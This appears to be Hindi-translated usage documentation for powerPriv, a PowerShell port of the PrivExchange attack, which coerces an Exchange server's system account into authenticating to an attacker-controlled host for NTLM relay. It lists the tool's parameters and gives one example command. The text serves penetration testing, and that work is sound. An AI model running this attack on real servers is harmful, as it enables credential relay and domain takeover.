
प्राइवेक्सचेंज का एक पावरशेल कार्यान्वयन जो वर्तमान उपयोगकर्ता के संदर्भ में चलने के लिए डिज़ाइन किया गया है।
PrivExchange का एक PowerShell कार्यान्वयन @_dirkjan द्वारा (मूल कोड यहाँ मिलेगा: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) उन वातावरणों के लिए उपयोगी जहाँ आप Python-आधारित एप्लिकेशन नहीं चला सकते, आपके पास उपयोगकर्ता क्रेडेंशियल्स हैं, या आप डिस्क पर फ़ाइलें नहीं छोड़ना चाहते। यह लक्ष्य Exchange सर्वर सिस्टम खाते को आपकी पसंद के सिस्टम पर प्रमाणित करने का प्रयास करने का कारण बनेगा।
-targetHostलक्ष्य Exchange बॉक्स का होस्टनाम या IP. DNS कॉन्फ़िगरेशन के आधार पर होस्टनाम का उपयोग करने पर FQDN की आवश्यकता हो सकती है। (आवश्यक)
-attackerHostआपके नियंत्रण वाले सिस्टम का होस्टनाम या IP, जिस पर आप आदर्श रूप से ntlmrelayx चला रहे हैं। हम Exchange सर्वर को बता रहे हैं कि इस सिस्टम पर प्रमाणित करने का प्रयास करें। DNS कॉन्फ़िगरेशन के आधार पर होस्टनाम का उपयोग करने पर FQDN की आवश्यकता हो सकती है। (आवश्यक)
-exchangePortExchange सर्वर से कनेक्ट करने का प्रयास करने का पोर्ट। डिफ़ॉल्ट 443 है।
-attackerPortExchange को हमलावर से वापस कनेक्ट करने का प्रयास करना चाहिए वह पोर्ट। डिफ़ॉल्ट 80 है।
-attackerPageवह पृष्ठ जिस पर हम Exchange सर्वर को हमारे हमले प्रणाली पर कनेक्ट करने के लिए कह रहे हैं। स्लैश की आवश्यकता नहीं है। डिफ़ॉल्ट powerPriv है।
-noSSLयदि आप Exchange सर्वर से शुरुआती कनेक्ट करने के लिए https का उपयोग नहीं करना चाहते तो true पर सेट करें। डिफ़ॉल्ट false है (https का उपयोग करें)।
-Versionहम जिस Exchange सर्वर को लक्षित कर रहे हैं उसका संस्करण। डिफ़ॉल्ट 2013 है।
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
लेखक: @g0ldenGunSec - @_dirkjan द्वारा बनाए गए उपकरण पर आधारित
इस उपकरण का उपयोग केवल उन नेटवर्कों पर करें जिनके आप मालिक हैं या जिनके खिलाफ परीक्षण करने की अनुमति है।